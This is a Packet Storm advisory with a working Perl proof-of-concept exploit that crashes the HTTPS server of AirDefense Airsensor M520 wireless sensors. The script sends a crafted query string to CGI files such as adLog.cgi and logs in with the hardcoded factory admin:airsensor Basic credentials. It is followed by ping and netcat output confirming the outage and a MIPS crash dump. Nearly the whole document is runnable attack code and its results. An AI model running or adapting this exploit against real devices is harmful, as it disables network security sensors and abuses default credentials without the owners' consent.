airsensor-dos.txt

🗓️ 19 Sep 2007 00:00:00 · Reported by Alex Hernandez · Type: packetstorm
🔗 packetstormsecurity.com

Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC. The crash is caused by an unspecified error in the filter applied to the CGI files used for configuration; it is triggered by crafted HTTPS requests (a percent-encoded payload in the query string of adLog.cgi, post.cgi or ad.cgi) that bring down the device's HTTPD. The "Use DHCP" option must be set to "No". Although the title says preauth, the PoC as published sends an HTTP Basic Authorization header for the default admin:airsensor account, so the request is authenticated with factory credentials. A buffer overflow debug log (MIPS register dump and stack trace from firmware 4.4.1.4) is included.

Code
```perl
#!/usr/bin/perl -w
#
# Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC
#
# The vulnerability is caused by an unspecified error in the CGI
# file filter used to configure properties. It can be exploited by
# sending a specially crafted HTTPS request (authentication is necessary;
# this PoC sends the default admin:airsensor Basic credentials),
# which causes the HTTPS service on the device to crash.
#
# Requirement: the "Use DHCP" interface option must be set to "No"
#
# Examples:
#
# GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1
# GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1
# GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1
#
# Pinging:
#
# Before:
#
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64
#
# After:
#
# Hardware error.
# Hardware error.
# Hardware error.
# Request timed out.
# Request timed out.
# Request timed out.
#
# C:\>nc -vvn 192.168.100.100 443
# (UNKNOWN) [192.168.100.100] 443 (?): connection refused
# sent 0, rcvd 0: NOTSOCK
#
# Buffer Overflow debug log:
#
# 1970-01-01 00:00:15 SYS-INFO:: AirDefense Firmware Version 4.4.1.4, Model = M520
# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR EXCEPTION ERROR
# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR VERSION NUMBER: 4.4.1.4
# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR Up Time: 00:08:51
# 1970-01-01 00:00:15 SYS-CRIT:: Time of Exception: 1970-01-01 00:08:55
# 1970-01-01 00:00:15 SYS-CRIT:: Exception ID = 10 ( Reserved Instruction)
# 1970-01-01 00:00:15 SYS-CRIT:: Thread = HTTPD
# 1970-01-01 00:00:15 SYS-CRIT:: MIPS Register Dump:
# 1970-01-01 00:00:15 SYS-CRIT:: zero=0x00000000 at=0xfffffffe v0=0x00000000 v1=0x00000000
# 1970-01-01 00:00:16 SYS-CRIT:: a0=0x00000000 a1=0x3d000000 a2=0x00000010 a3=0x00000041
# 1970-01-01 00:00:16 SYS-CRIT:: t0=0x00000000 t1=0x0000003d t2=0x0000000b t3=0x00000000
# 1970-01-01 00:00:16 SYS-CRIT:: t4=0x802f799c t5=0xf43dd40f t6=0x0066a1a4 t7=0x4df0e494
# 1970-01-01 00:00:16 SYS-CRIT:: s0=0x802f7dbf s1=0x0000001f s2=0x802f7910 s3=0x80120000
# 1970-01-01 00:00:16 SYS-CRIT:: s4=0x80120000 s5=0x80986c30 s6=0x80120000 s7=0x80128afc
# 1970-01-01 00:00:16 SYS-CRIT:: t8=0x480ec8cd t9=0x742b7136 k0=0x802f78c8 k1=0x802f7910
# 1970-01-01 00:00:16 SYS-CRIT:: gp=0x8015b070 sp=0x802f7910 fp=0x80128aec ra=0x800b2534
# 1970-01-01 00:00:16 SYS-CRIT:: Address of instruction that caused exception = 0x800b2534
# 1970-01-01 00:00:16 SYS-CRIT:: Memory address at which adress exception occured = 0x00000000
# 1970-01-01 00:00:16 SYS-CRIT:: Return address = 0x800b2534
# 1970-01-01 00:00:17 SYS-CRIT:: Status Reg = 0x1000af03
# 1970-01-01 00:00:17 SYS-CRIT:: Cache Reg = 0x00000000
# 1970-01-01 00:00:17 SYS-CRIT:: Cause Reg = 0x30000028
# 1970-01-01 00:00:17 SYS-CRIT:: Config Reg = 0x03fffbfb
# 1970-01-01 00:00:17 SYS-CRIT:: Vector = 40
# 1970-01-01 00:00:17 SYS-CRIT:: Processor Version = 0x00018009
# 1970-01-01 00:00:17 SYS-CRIT:: Stack Trace Begin: "->" = return address
# 1970-01-01 00:00:17 SYS-CRIT:: [802f7910]=0x802f7dbf
# 1970-01-01 00:00:17 SYS-CRIT:: [802f7914]=0x00000000
# 1970-01-01 00:00:17 SYS-CRIT:: [802f7918]=0x00000000
# 1970-01-01 00:00:19 SYS-CRIT:: [802f7990]=0x80130000
# 1970-01-01 00:00:19 SYS-CRIT:: [802f7994]=0x802f7db4
# 1970-01-01 00:00:19 SYS-CRIT:: [802f7998]=0x80152e18
# 1970-01-01 00:00:19 SYS-CRIT:: [802f799c]=0x80152ed8
# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a0]=0x802f7dbf
# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a4]=0x80986c30
# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a8]=0x802f8200
# 1970-01-01 00:00:19 SYS-CRIT:: ->[802f79ac]=0x800f0450 <- return address
# 1970-01-01 00:00:19 SYS-CRIT:: [802f79b0]=0x0d0a0074
# 1970-01-01 00:00:21 SYS-CRIT:: Stack Trace End:
#
# The vulnerability has been reported in the following AirDefense versions:
#
# Firmware Version 4.3.1.1, Model = M520
# Firmware Version 4.4.1.4, Model = M520
#
# More information: http://www.airdefense.net
# http://support.airdefense.net
#
# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd.
#
# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55,
# pikah, codebreak, h3llfyr3
#
# Alex Hernandez ahernandez [at] sybsecurity dot com
#

use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Headers;

my $string  = "%41%41%41";               # Payload appended to the query string
my $method  = 'GET';                     # Method "GET" or "POST"
my $uri     = 'https://192.168.100.100'; # Factory default IP address
my $content = "/adLog.cgi?";             # CGI file to crash

#my $content = "/ad.cgi?";
#my $content = "/post.cgi?";
#my $content = "/logout.cgi?";

# Header names are given without a trailing colon; HTTP::Headers adds it
# when the request is serialised.
my $headers = HTTP::Headers->new(
    'Host'            => '192.168.100.100',
    'User-Agent'      => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6',
    'Accept'          => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
    'Accept-Language' => 'en-us,en;q=0.5',
    'Accept-Charset'  => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
    'Keep-Alive'      => '300',
    'Connection'      => 'keep-alive',
    'Referer'         => 'https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh',
    'Authorization'   => 'Basic YWRtaW46YWlyc2Vuc29y', # base64 of admin:airsensor
);

# HTTP::Request->new takes (method, uri, headers, body). The CGI path and
# the payload belong in the request URI, so the sensor receives
# GET /adLog.cgi?%41%41%41 as in the examples above.
my $request = HTTP::Request->new($method, $uri . $content . $string, $headers);

# The sensor presents a self-signed certificate, so certificate checks are
# disabled; the timeout keeps the script from hanging once the HTTPD dies.
my $ua = LWP::UserAgent->new(
    timeout  => 10,
    ssl_opts => { verify_hostname => 0, SSL_verify_mode => 0 },
);
my $response = $ua->request($request);

print "[+] Denial of Service exploit for Airsensor M520 Final\n";
print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n";
print "[+] We got this response from sensor: \n\n" . $response->content . "\n";

# The CGI answers with '&'-separated key=value pairs, e.g. RESULT=0&RESPMSG=...
my $data = {};
foreach my $pair (split('&', $response->content)) {
    my ($k, $v) = split('=', $pair, 2);
    $data->{$k} = $v if defined $k;
}

if (defined $data->{RESULT} && $data->{RESULT} != 0) {
    # The sensor answered and rejected the request: nothing crashed.
    print "[+] Denial of Service exploit for Airsensor M520 Final\n";
    print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n";
    print "[+] Use:\n";
    print "\tperl -x dos_sensor.pl\n";
    print((defined $data->{RESPMSG} ? $data->{RESPMSG} : '') . "\n");
    exit(0);
} else {
    # No RESULT=<nonzero> came back: the HTTPD has most likely gone down.
    print "[+] Denial of service Exploit successed!!!\n";
    print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n";
}
```
